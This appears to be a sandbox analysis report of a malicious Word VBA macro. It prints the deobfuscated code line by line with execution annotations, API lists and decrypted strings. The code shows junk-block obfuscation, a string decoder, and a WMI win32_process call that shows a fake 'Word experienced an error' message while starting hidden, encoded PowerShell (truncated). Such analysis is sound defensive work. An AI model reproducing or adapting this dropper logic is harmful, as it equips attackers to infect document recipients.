                                        Goto NHymnJzG

                                        56

                                        Dim TiWkS as Object

                                        57

                                        Set PkQhSAw = eBvGf

                                        eBvGf

                                        58

                                        Set TiWkS = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        59

                                        Dim NHymnJzG as Object

                                        60

                                        Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")

                                        CreateTextFile

                                        61

                                        NHymnJzG.WriteLine "QCgbCFzJiDJUEIHES"

                                        WriteLine

                                        62

                                        NHymnJzG.WriteLine "AfSXEBzJIIxvQmJC"

                                        WriteLine

                                        63

                                        NHymnJzG.WriteLine "zDOlFEIFBVWkPbIC"

                                        WriteLine

                                        64

                                        Set ImZpAHpaF = bYwGEijH

                                        bYwGEijH

                                        65

                                        NHymnJzG.Close

                                        Close

                                        66

                                        Set TiWkS = Nothing

                                        67

                                        Set UgnVAHcRD = uvgvJGfI

                                        uvgvJGfI

                                        68

                                        Set NHymnJzG = Nothing

                                        68

                                        NHymnJzG:

                                        70

                                        C0g8w_98xxaqclw4 = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                        Mid

                                        Name

                                        Application

                                        71

                                        Goto rfIxFdkBE

                                        72

                                        Dim ZZzrG as Object

                                        73

                                        Set ArkJEKEEH = rINmB

                                        rINmB

                                        74

                                        Set ZZzrG = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        75

                                        Dim rfIxFdkBE as Object

                                        76

                                        Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")

                                        CreateTextFile

                                        77

                                        rfIxFdkBE.WriteLine "xfhECJccxFyA"

                                        WriteLine

                                        78

                                        rfIxFdkBE.WriteLine "AdLOPbWTXOCCRm"

                                        WriteLine

                                        79

                                        rfIxFdkBE.WriteLine "cWptEtSbgvWCAD"

                                        WriteLine

                                        80

                                        Set ZEetCEyLC = iOplaUSwB

                                        iOplaUSwB

                                        81

                                        rfIxFdkBE.Close

                                        Close

                                        82

                                        Set ZZzrG = Nothing

                                        83

                                        Set uSvkK = kUseBAG

                                        kUseBAG

                                        84

                                        Set rfIxFdkBE = Nothing

                                        84

                                        rfIxFdkBE:

                                        86

                                        M8v1nootk49plci = Agz22fuzun5rgvbir + C0g8w_98xxaqclw4 + Pmgv9nf28vkxhyvys + t3s + Eyshwbjqie_zkc

                                        87

                                        Goto bcUFD

                                        88

                                        Dim zetDIDBDI as Object

                                        89

                                        Set eTBBLHXwx = qdDeFbDk

                                        qdDeFbDk

                                        90

                                        Set zetDIDBDI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        91

                                        Dim bcUFD as Object

                                        92

                                        Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")

                                        CreateTextFile

                                        93

                                        bcUFD.WriteLine "wOTiEDqNZtWN"

                                        WriteLine

                                        94

                                        bcUFD.WriteLine "xaOQJbzFVCXtJADD"

                                        WriteLine

                                        95

                                        bcUFD.WriteLine "ufltvttBnHJNx"

                                        WriteLine

                                        96

                                        Set vKdAbBHGq = UbNkCZ

                                        UbNkCZ

                                        97

                                        bcUFD.Close

                                        Close

                                        98

                                        Set zetDIDBDI = Nothing

                                        99

                                        Set NctjGT = fMPBmQ

                                        fMPBmQ

                                        100

                                        Set bcUFD = Nothing

                                        100

                                        bcUFD:

                                        102

                                        J_gncosnr4av4lr = Slz39ct0lz_ksnd(M8v1nootk49plci)

                                        103

                                        Goto TOXmCsgb

                                        104

                                        Dim TjDNNFkVD as Object

                                        105

                                        Set IfdcD = sbLwDeWJ

                                        sbLwDeWJ

                                        106

                                        Set TjDNNFkVD = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        107

                                        Dim TOXmCsgb as Object

                                        108

                                        Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")

                                        CreateTextFile

                                        109

                                        TOXmCsgb.WriteLine "GqSFCtOyDYdfx"

                                        WriteLine

                                        110

                                        TOXmCsgb.WriteLine "QsixYFOXyEEAmh"

                                        WriteLine

                                        111

                                        TOXmCsgb.WriteLine "QxWCtMBxGzkkBAU"

                                        WriteLine

                                        112

                                        Set KFlvRoHB = JjBKEUXqH

                                        JjBKEUXqH

                                        113

                                        TOXmCsgb.Close

                                        Close

                                        114

                                        Set TjDNNFkVD = Nothing

                                        115

                                        Set WiXswI = GEopA

                                        GEopA

                                        116

                                        Set TOXmCsgb = Nothing

                                        116

                                        TOXmCsgb:

                                        118

                                        Set Tp28g8vd8ptrsy = CreateObject(J_gncosnr4av4lr)

                                        CreateObject("winmgmts:win32_process")

                                        executed
                                        119

                                        Goto yHxgEeJg

                                        120

                                        Dim AUZLIjCLH as Object

                                        121

                                        Set aCXYJWIHA = BuEcDJvc

                                        BuEcDJvc

                                        122

                                        Set AUZLIjCLH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        123

                                        Dim yHxgEeJg as Object

                                        124

                                        Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")

                                        CreateTextFile

                                        125

                                        yHxgEeJg.WriteLine "RMNuAAEfwmHGkp"

                                        WriteLine

                                        126

                                        yHxgEeJg.WriteLine "YfIwYFFntmmdDsPv"

                                        WriteLine

                                        127

                                        yHxgEeJg.WriteLine "nbBVBbrmTJhR"

                                        WriteLine

                                        128

                                        Set vsASGFtA = JkICEEJbA

                                        JkICEEJbA

                                        129

                                        yHxgEeJg.Close

                                        Close

                                        130

                                        Set AUZLIjCLH = Nothing

                                        131

                                        Set VWiBw = hrqzdCF

                                        hrqzdCF

                                        132

                                        Set yHxgEeJg = Nothing

                                        132

                                        yHxgEeJg:

                                        134

                                        Ufvxqjlwai0p9fg8tc = Mid(sf4, (1 + 4), Len(sf4))

                                        Mid

                                        Len(sf4) -> 17453

                                        executed
                                        135

                                        Goto ApdWADYGV

                                        136

                                        Dim UjlQFBJj as Object

                                        137

                                        Set cTUpB = SYgbDdCEH

                                        SYgbDdCEH

                                        138

                                        Set UjlQFBJj = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        139

                                        Dim ApdWADYGV as Object

                                        140

                                        Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")

                                        CreateTextFile

                                        141

                                        ApdWADYGV.WriteLine "JNHUAINVrwxEKEHD"

                                        WriteLine

                                        142

                                        ApdWADYGV.WriteLine "EXrpEHndyyG"

                                        WriteLine

                                        143

                                        ApdWADYGV.WriteLine "TwoNCIGurJPYA"

                                        WriteLine

                                        144

                                        Set AFnzJ = IuDSasFIm

                                        IuDSasFIm

                                        145

                                        ApdWADYGV.Close

                                        Close

                                        146

                                        Set UjlQFBJj = Nothing

                                        147

                                        Set PzSZDA = LUJoKCCQ

                                        LUJoKCCQ

                                        148

                                        Set ApdWADYGV = Nothing

                                        148

                                        ApdWADYGV:

                                        150

                                        Goto eLNGd

                                        151

                                        Dim buKzFt as Object

                                        152

                                        Set ryExIJiIc = xDUMl

                                        xDUMl

                                        153

                                        Set buKzFt = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        154

                                        Dim eLNGd as Object

                                        155

                                        Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")

                                        CreateTextFile

                                        156

                                        eLNGd.WriteLine "GApbBIepzWxnI"

                                        WriteLine

                                        157

                                        eLNGd.WriteLine "lkkOeHeJHjmGONABFI"

                                        WriteLine

                                        158

                                        eLNGd.WriteLine "lSOfQyhpoF"

                                        WriteLine

                                        159

                                        Set dUEpTnTJX = TFPJDBSa

                                        TFPJDBSa

                                        160

                                        eLNGd.Close

                                        Close

                                        161

                                        Set buKzFt = Nothing

                                        162

                                        Set NPOhCPGF = hKDFekFGF

                                        hKDFekFGF

                                        163

                                        Set eLNGd = Nothing

                                        163

                                        eLNGd:

                                        165

                                        Tp28g8vd8ptrsy.Create Slz39ct0lz_ksnd(Ufvxqjlwai0p9fg8tc), L_4bpvggv2vokj75, Nakuayuxnnrg5

                                        SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD …,,) -> 0

                                        L_4bpvggv2vokj75

                                        Nakuayuxnnrg5

                                        executed
                                        166

                                        Goto hQCyFzF

                                        167

                                        Dim msoKFIIMI as Object

                                        168

                                        Set gJsfsb = IYlnG

                                        IYlnG

                                        169

                                        Set msoKFIIMI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        170

                                        Dim hQCyFzF as Object

                                        171

                                        Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")

                                        CreateTextFile

                                        172

                                        hQCyFzF.WriteLine "ehJSnoaWvoCEfGL"

                                        WriteLine

                                        173

                                        hQCyFzF.WriteLine "uAYnHfspvFJ"

                                        WriteLine

                                        174

                                        hQCyFzF.WriteLine "GuEmEfvZLaJDIAX"

                                        WriteLine

                                        175

                                        Set ZQkkGq = nEFlbEa

                                        nEFlbEa

                                        176

                                        hQCyFzF.Close

                                        Close

                                        177

                                        Set msoKFIIMI = Nothing

                                        178

                                        Set kcuElHl = ClgfEDCg

                                        ClgfEDCg

                                        179

                                        Set hQCyFzF = Nothing

                                        179

                                        hQCyFzF:

                                        181

                                        Goto sPUjHbDB

                                        182

                                        Dim FijxC as Object

                                        183

                                        Set sewLMSSJg = UcUhFvH

                                        UcUhFvH

                                        184

                                        Set FijxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        185

                                        Dim sPUjHbDB as Object

                                        186

                                        Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")

                                        CreateTextFile

                                        187

                                        sPUjHbDB.WriteLine "jyJEJqDCTEnyIA"

                                        WriteLine

                                        188

                                        sPUjHbDB.WriteLine "pIHMJANYJmFIe"

                                        WriteLine

                                        189

                                        sPUjHbDB.WriteLine "tZZjtwJRCQcVAD"

                                        WriteLine

                                        190

                                        Set HjcgHbA = ncXeGEGfF

                                        ncXeGEGfF

                                        191

                                        sPUjHbDB.Close

                                        Close

                                        192

                                        Set FijxC = Nothing

                                        193

                                        Set KzJMOvqoA = kIALACE

                                        kIALACE

                                        194

                                        Set sPUjHbDB = Nothing

                                        194

                                        sPUjHbDB:

                                        196

                                        End Function

                                        APIs | Meta Information

                                        yKTqX

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        PdhtG

                                        Close

                                        QAhNFQ

                                        WOdrGBJG

                                        CreateObject

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        GPfHF

                                        Close

                                        hKjoxAHI

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Leedy8frqauxr

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: bzYfQcEHB

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: xZGeAsHP

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Close

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: naqcFCA

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Replace

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Ty8salh27qds_

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: dwJWfYEzQ

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: vkAhEABKZ

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Close

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: LXJdHABRP

                                        ODgRUaAId

                                        CreateObject

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        uLRAyCA

                                        Close

                                        LBFSC

                                        YBonG

                                        CreateObject

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        noyuzC

                                        Close

                                        gxwmz

                                        Strings | Decrypted Strings
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB"
                                        "CljNpAVDuUTJuHv"
                                        "RVkNwtRXUzC"
                                        "DTeWBCeIuXcgIDGC"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU"
                                        "yfwQBHQfgeJbFJB"
                                        "lObhAqBUYxXfy"
                                        "RmgSBGJYhhoQDxVIT"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ"
                                        "eKjGCADVsuMVfjHhDc"
                                        "mMpvHwuBnnrqGyIFq"
                                        "hWxuzXUxYdWuBHC"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "LhykJB:\jTdNFUJ\PnxpBEA.YspSlC"
                                        "hDlEFEcAPqOXZqg"
                                        "WVtJEvzwejAL"
                                        "YIyOHHHeDXloKIBE"
                                        Line | Instruction | Meta Information
                                        197

                                        Function Slz39ct0lz_ksnd(Oap3dn26wvi2z)

                                        198

                                        On Error Resume Next

                                        executed
                                        199

                                        Goto fdLCFDmF

                                        200

                                        Dim WqyIx as Object

                                        201

                                        Set fqoDE = yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        202

                                        Set WqyIx = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        203

                                        Dim fdLCFDmF as Object

                                        204

                                        Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        205

                                        fdLCFDmF.WriteLine "CljNpAVDuUTJuHv"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        206

                                        fdLCFDmF.WriteLine "RVkNwtRXUzC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        207

                                        fdLCFDmF.WriteLine "DTeWBCeIuXcgIDGC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        208

                                        Set eDbUAXI = PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        209

                                        fdLCFDmF.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        210

                                        Set WqyIx = Nothing

                                        211

                                        Set mbDbF = QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        212

                                        Set fdLCFDmF = Nothing

                                        212

                                        fdLCFDmF:

                                        214

                                        X_3mj_vfdq5m9 = Oap3dn26wvi2z

                                        215

                                        Goto tfgmN

                                        216

                                        Dim tNvqYU as Object

                                        217

                                        Set GzGtFB = WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        218

                                        Set tNvqYU = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        219

                                        Dim tfgmN as Object

                                        220

                                        Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        221

                                        tfgmN.WriteLine "yfwQBHQfgeJbFJB"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        222

                                        tfgmN.WriteLine "lObhAqBUYxXfy"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        223

                                        tfgmN.WriteLine "RmgSBGJYhhoQDxVIT"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        224

                                        Set fxJTHGJF = GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        225

                                        tfgmN.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        226

                                        Set tNvqYU = Nothing

                                        227

                                        Set qhuKHDC = hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        228

                                        Set tfgmN = Nothing

                                        228

                                        tfgmN:

                                        230

                                        Vald5avf9551m1u9_q = Zacj6cs0xxmkchq(X_3mj_vfdq5m9)

                                        231

                                        Goto JJetH

                                        232

                                        Dim MeLoxDCJT as Object

                                        233

                                        Set EcBqJBVE = ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        234

                                        Set MeLoxDCJT = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        235

                                        Dim JJetH as Object

                                        236

                                        Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        237

                                        JJetH.WriteLine "eKjGCADVsuMVfjHhDc"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        238

                                        JJetH.WriteLine "mMpvHwuBnnrqGyIFq"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        239

                                        JJetH.WriteLine "hWxuzXUxYdWuBHC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        240

                                        Set ixuyHGriH = uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        241

                                        JJetH.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        242

                                        Set MeLoxDCJT = Nothing

                                        243

                                        Set XSlyHJ = LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        244

                                        Set JJetH = Nothing

                                        244

                                        JJetH:

                                        246

                                        Slz39ct0lz_ksnd = Vald5avf9551m1u9_q

                                        247

                                        Goto hgvZG

                                        248

                                        Dim TmGkDL as Object

                                        249

                                        Set QCDEyAHw = YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        250

                                        Set TmGkDL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        251

                                        Dim hgvZG as Object

                                        252

                                        Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        253

                                        hgvZG.WriteLine "hDlEFEcAPqOXZqg"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        254

                                        hgvZG.WriteLine "WVtJEvzwejAL"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        255

                                        hgvZG.WriteLine "YIyOHHHeDXloKIBE"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        256

                                        Set FrVPCyW = noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        257

                                        hgvZG.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        258

                                        Set TmGkDL = Nothing

                                        259

                                        Set kggQZcCIE = gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        260

                                        Set hgvZG = Nothing

                                        260

                                        hgvZG:

                                        262

                                        End Function

                                        APIs | Meta Information

                                        Leedy8frqauxr

                                        bzYfQcEHB

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        xZGeAsHP

                                        Close

                                        naqcFCA

                                        Replace

